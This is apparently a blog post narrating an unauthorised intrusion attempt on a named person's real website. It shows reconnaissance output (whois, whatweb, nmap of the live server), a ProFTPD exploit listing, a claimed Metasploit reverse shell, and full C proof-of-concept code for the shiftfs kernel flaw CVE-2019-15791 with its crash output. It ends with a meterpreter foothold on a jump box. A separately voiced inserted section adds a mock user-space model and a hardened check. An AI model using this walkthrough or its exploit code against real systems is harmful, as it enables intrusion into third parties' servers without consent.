A penetration attempt against KIRA's site
Bored, so I tried my hand on Kira's blog. m(_ _)m
In the end it failed. The main reason is that I am not familiar with internal-network pivoting, so I am leaving it here for now... The environment at the company is not enough for me to try anything more, either.
...the damned intranet.
Whois lookup of BellSprite.com
Whois Record for BellSprite.com
Domain Profile
Registrant: Whois Agent
Registrant Org: Domain Protection Services, Inc.
Registrant Country: us
Registrar: Name.com, Inc.
  IANA ID: 625
  URL: http://www.name.com
  Whois Server: whois.name.com
Registrar Status: clientTransferProhibited
Dates: 2,729 days old
  Created on 2012-05-31
  Expires on 2020-05-31
  Updated on 2018-11-21
Name Servers:
  NS1.DREAMHOST.COM (has 1,293,199 domains)
  NS2.DREAMHOST.COM (has 1,293,199 domains)
  NS3.DREAMHOST.COM (has 1,293,199 domains)
Tech Contact: Whois Agent
  Domain Protection Services, Inc.
  PO Box 1769, Denver, CO, 80201, us
IP Address: 【75.119.207.156 - 52 other sites hosted on this server】
IP Location: United States - California - Brea - New Dream Network Llc
ASN: United States AS26347 DREAMHOST-AS - New Dream Network, LLC, US (registered Aug 28, 2002)
Domain Status: Registered And Active Website
IP History: 6 changes on 6 unique IP addresses over 7 years
Registrar History: 1 registrar
Hosting History: 3 changes on 2 unique name servers over 7 years
Website
Website Title: 认真你就输了 – kira的网络日志
Server Type: 【Apache】
Response Code: 200
Terms: 1,399 (Unique: 877, Linked: 394)
Images: 8 (Alt tags missing: 0)
Links: 139 (Internal: 121, Outbound: 16)
Whatweb scan of the site BellSprite.com
http://bellsprite.com [200 OK] Apache, Country[UNITED STATES][US],
HTML5, HTTPServer[Apache],
IP[75.119.207.156],
JQuery, MetaGenerator【WordPress 5.2.4】,
Script[text/javascript],
Title[认真你就输了 – kira的网络日志],
UncommonHeaders[link,upgrade]
Online Nmap scan of the IP 75.119.207.156
75.119.207.156 (apache2-heavy.caldera.dreamhost.com)
PORT     STATE  SERVICE  VERSION
21/tcp   open   ftp      ProFTPD 1.2.10
22/tcp   open   ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http     Apache httpd
443/tcp  open   https    Apache httpd
587/tcp  open   smtp     Postfix smtpd
Online OpenVAS scan of 75.119.207.156, or simply look up (ProFTPD 1.2.10) on CVE Details
Vulnerabilities found for Proftpd 1.2.10 (port 21/tcp )
Risk level(CVSS) CVE Summary
9 CVE-2011-4130 Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
7.1 CVE-2010-3867 Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
6.8 CVE-2010-4652 Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
5 CVE-2011-1137 Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
4 CVE-2008-7265 The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
1.2 CVE-2012-6095 ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
No vulnerabilities found for port 22
No vulnerabilities found for port 80 (missing version information)
No vulnerabilities found for port 443 (missing version information)
No vulnerabilities found for port 587 (missing version information)
Searching exploit-db for (ProFTPD 1.2.10) shows 37 exploits across the whole product line; here I searched for (ProFTPD):
2015-06-10 ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) Remote Linux Metasploit
2015-04-21 ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution Remote Linux R-73eN
2015-04-13 ProFTPd 1.3.5 - File Copy Remote Linux anonymous
2009-02-10 ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection Remote Multiple AlpHaNiX
2003-09-23 ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun DoS Linux netris
2002-12-09 ProFTPd 1.2.x - 'STAT' Denial of Service DoS Linux Rob klein Gunnewiek
2001-03-15 WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion Remote Linux Frank DENIS
2000-12-20 ProFTPd 1.2 - 'SIZE' Remote Denial of Service DoS Linux JeT-Li
1999-09-17 ProFTPd 1.2 pre6 - 'snprintf' Remote Root Remote Linux Tymm Twillman
1999-08-27 ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) Remote Linux anonymous
1999-08-17 ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) Remote Linux babcia padlina ltd
1999-02-09 WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) Remote Linux jamez & c0nd0r
1999-02-09 WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) Remote Linux smiler & cossack
2011-12-01 FreeBSD - 'ftpd / ProFTPd' Remote Command Execution Remote FreeBSD kingcope
2010-12-03 ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) Remote Linux Metasploit
2010-12-02 ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-01-09 ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-01-09 ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-02-07 ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) DoS Linux kingcope
2010-12-02 ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution Remote Linux anonymous
2010-11-07 ProFTPd IAC 1.3.x - Remote Command Execution Remote Linux kingcope
2009-10-12 ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow Local Unix Michael Domberg
2009-02-10 ProFTPd - 'mod_mysql' Authentication Bypass Remote Multiple gat3way
2007-08-24 ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow Remote Linux netris
2007-04-13 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow Local Linux Xpl017Elz
2007-02-19 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) Local Linux Revenge
2007-02-18 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) Local Linux Revenge
2003-10-15 ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) Remote Linux Solar Eclipse
2006-12-13 ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) DoS Linux Core Security
2006-11-27 ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) Remote Linux Evgeny Legerov
2004-10-17 ProFTPd 1.2.10 - Remote Users Enumeration Remote Linux Leon Juranic
2004-08-13 ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow Local Linux pi3
2001-01-12 ProFTPd 1.2.0 pre10 - Remote Denial of Service DoS Linux JeT-Li
2001-01-03 ProFTPd 1.2.0 rc2 - Memory Leakage DoS Linux Piotr Zurawski
2003-10-13 ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force Remote Linux Haggis
2003-10-04 ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) Remote Linux bkbll
2003-06-19 ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection Remote Linux Spaine
From these I picked one of the Metasploit exploits, got the reverse payload back without trouble, and the connection succeeded.
But at that point I found I did not have administrator privileges, so I needed to escalate.
uname -a
Got the server version: Ubuntu 18.04 LTS
Then I checked its CVEs. My god, a pile of red 10-pointers.
Since I used to do C++ development and buffer overflows are what I am most comfortable with, I picked a 2019 CVE, CVE-2019-15791, and analyzed it.
The core of this CVE is in the shiftfs driver (fs/shiftfs.c in the Ubuntu kernel), in shiftfs_btrfs_ioctl_fd_replace(). The mnt/shiftfs path in the PoC below is just the mount point of a shiftfs instance, not the location of the bug.
The relevant excerpt of shiftfs.c (elided):
static int shiftfs_btrfs_ioctl_fd_replace(/* ... */)
{
	/* ... */
	src = fdget(oldfd);          /* oldfd comes straight from the caller */
	if (!src.file)
		return -EINVAL;

	/* no check that src.file is actually a shiftfs file */
	ret = shiftfs_real_fdget(src.file, lfd);
	/* ... */
}

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
	/* private_data is filesystem-specific; blindly reinterpreted here */
	struct shiftfs_file_info *file_info = file->private_data;
	struct file *realfile = file_info->realfile;
	/* ... */
}
The problem in detail: shiftfs_btrfs_ioctl_fd_replace() calls fdget() on a caller-supplied fd and hands the resulting struct file straight to shiftfs_real_fdget(), which reinterprets file->private_data as a struct shiftfs_file_info * without ever checking that the file belongs to shiftfs.
file->private_data is an opaque pointer whose type depends on the filesystem that opened the file, so any fd the caller can obtain turns this into a type confusion. In the published PoC (Jann Horn, Project Zero) the fd is /proc/self/environ, whose private_data points to the process's struct mm_struct. shiftfs reads realfile at offset 0x10 (right after the 16-byte struct path realpath); at offset 0x10 of struct mm_struct sits vmacache_seqnum, a counter that is bumped on every munmap(). Doing 0x4242 mmap/munmap rounds therefore makes the bogus "realfile" pointer equal 0x4242, and when shiftfs dereferences it to read f_flags the kernel faults on an unmapped address just above 0x4242 (the 0x4289 in the oops below). This is an invalid pointer dereference caused by type confusion, not a use-after-free, and since the attacker chooses the seqnum, the attacker chooses where the dereference lands.
So, call it with forged arguments:
#include <err.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/btrfs.h>

int main(void) {
  // Bump mm->vmacache_seqnum to 0x4242: every munmap() increments it, and
  // shiftfs will later misread that counter as the 'realfile' pointer.
  for (int i = 0; i < 0x4242; i++) {
    void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
                   MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
    munmap(x, 0x1000);
  }
  // Root of a shiftfs mount; its ioctl handler is the vulnerable code path.
  int root = open("mnt/shiftfs", O_RDONLY);
  if (root == -1) err(1, "open shiftfs root");
  // A non-shiftfs file: its private_data is an mm_struct, not a shiftfs_file_info.
  int foofd = open("/proc/self/environ", O_RDONLY);
  if (foofd == -1) err(1, "open foofd");
  // BTRFS_IOC_SNAP_CREATE reaches shiftfs_btrfs_ioctl_fd_replace() with .fd as oldfd.
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
  return 0;
}
Success:
BUG: unable to handle page fault for address: 0000000000004289
Call Trace:
shiftfs_ioctl+0x65/0x76 [shiftfs]
do_vfs_ioctl+0x407/0x670
? putname+0x4a/0x50
ksys_ioctl+0x67/0x90
__x64_sys_ioctl+0x1a/0x20
do_syscall_64+0x5a/0x130
entry_SYSCALL_64_after_hwframe+0x44/0xa9
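To make the offset coincidence behind that oops concrete, here is an added user-space model. It is my example, not code from this post, from the PoC's author or from the shiftfs driver. It copies only the order of the leading fields of struct shiftfs_file_info, struct mm_struct and struct file into mock structs (an assumption about x86-64 Linux 5.x layout; nothing else about the real structures is modelled), lets the vulnerable shiftfs_real_fdget() logic read an mm_struct as if it were a shiftfs_file_info, and places it beside a hardened variant that checks the file's f_op before trusting private_data (modelled on the approach of the fix; the exact upstream check is an assumption).

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Mock structs: only the ORDER of the leading fields follows the real Linux
 * 5.x x86-64 definitions (assumption). Nothing here touches a kernel. */
struct file_mock;

struct path_mock { void *mnt; void *dentry; };            /* 16 bytes, like struct path */

struct shiftfs_file_info_mock {                            /* what shiftfs expects */
    struct path_mock realpath;
    struct file_mock *realfile;                            /* at offset 0x10 */
};

struct mm_struct_mock {                                    /* what /proc/self/environ carries */
    void *mmap;
    void *mm_rb;
    uint64_t vmacache_seqnum;                              /* also at offset 0x10 */
};

struct file_operations_mock { const char *owner; };

struct file_mock {
    const struct file_operations_mock *f_op;               /* identifies the owning filesystem */
    unsigned int f_flags;
    void *private_data;                                    /* opaque; its type depends on f_op */
};

static const struct file_operations_mock shiftfs_file_operations = { "shiftfs" };
static const struct file_operations_mock proc_environ_operations = { "proc" };

/* Vulnerable: trusts private_data unconditionally, like the original
 * shiftfs_real_fdget(). Returns the value it would then use as 'realfile'. */
static uintptr_t confused_real_fdget(const struct file_mock *file)
{
    const struct shiftfs_file_info_mock *fi = file->private_data;
    return (uintptr_t)fi->realfile;
}

/* Hardened: refuse any file that is not a shiftfs file before the cast.
 * Assumption: models the fixed driver's f_op identity check. */
static int hardened_real_fdget(const struct file_mock *file, struct file_mock **lower)
{
    if (file->f_op != &shiftfs_file_operations)
        return -EINVAL;
    const struct shiftfs_file_info_mock *fi = file->private_data;
    *lower = fi->realfile;
    return 0;
}

/* A /proc/self/environ-style file whose mm_struct has seen 'seqnum' munmap()
 * calls (each one bumps vmacache_seqnum by one). Constructed test data. */
static void make_proc_environ_file(struct file_mock *f, struct mm_struct_mock *mm, uint64_t seqnum)
{
    mm->mmap = NULL; mm->mm_rb = NULL; mm->vmacache_seqnum = seqnum;
    f->f_op = &proc_environ_operations; f->f_flags = 0; f->private_data = mm;
}

/* A genuine shiftfs file wrapping 'lower'. Constructed test data. */
static void make_shiftfs_file(struct file_mock *f, struct shiftfs_file_info_mock *fi, struct file_mock *lower)
{
    fi->realpath.mnt = NULL; fi->realpath.dentry = NULL; fi->realfile = lower;
    f->f_op = &shiftfs_file_operations; f->f_flags = 0; f->private_data = fi;
}

/* After 'seqnum' munmap rounds, which pointer does the vulnerable code dereference? */
static uintptr_t demo_confused_realfile(uint64_t seqnum)
{
    struct mm_struct_mock mm;
    struct file_mock environ_file;
    make_proc_environ_file(&environ_file, &mm, seqnum);
    return confused_real_fdget(&environ_file);
}

/* The hardened path returns -EINVAL for the procfs file... */
static int demo_hardened_rejects_proc_file(void)
{
    struct mm_struct_mock mm;
    struct file_mock environ_file, *out = NULL;
    make_proc_environ_file(&environ_file, &mm, 0x4242);
    return hardened_real_fdget(&environ_file, &out);
}

/* ...and still resolves a real shiftfs file to its lower file (returns 1). */
static int demo_hardened_accepts_shiftfs_file(void)
{
    struct shiftfs_file_info_mock fi;
    struct file_mock lower, f, *out = NULL;
    make_shiftfs_file(&f, &fi, &lower);
    return hardened_real_fdget(&f, &out) == 0 && out == &lower;
}

int main(void)
{
    printf("realfile offset 0x%zx, vmacache_seqnum offset 0x%zx\n",
           offsetof(struct shiftfs_file_info_mock, realfile),
           offsetof(struct mm_struct_mock, vmacache_seqnum));
    printf("confused 'realfile' after 0x4242 munmaps: 0x%lx\n",
           (unsigned long)demo_confused_realfile(0x4242));
    printf("hardened: proc file -> %d, shiftfs file ok -> %d\n",
           demo_hardened_rejects_proc_file(), demo_hardened_accepts_shiftfs_file());
    return 0;
}
```

Compile with gcc -Wall and run: the confused read returns whatever vmacache_seqnum the munmap loop left behind, which is exactly why the PoC above gets to pick the faulting address, while the hardened variant returns -EINVAL for the procfs file and still hands back the lower file for a genuine shiftfs file.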
Then I built a meterpreter payload and connected to the target machine successfully, only to find it was just a jump box...
I could not work out how to go on with the internal network, so GG here for now...
Not skilled enough, not enough time, frustrating~ should try harder.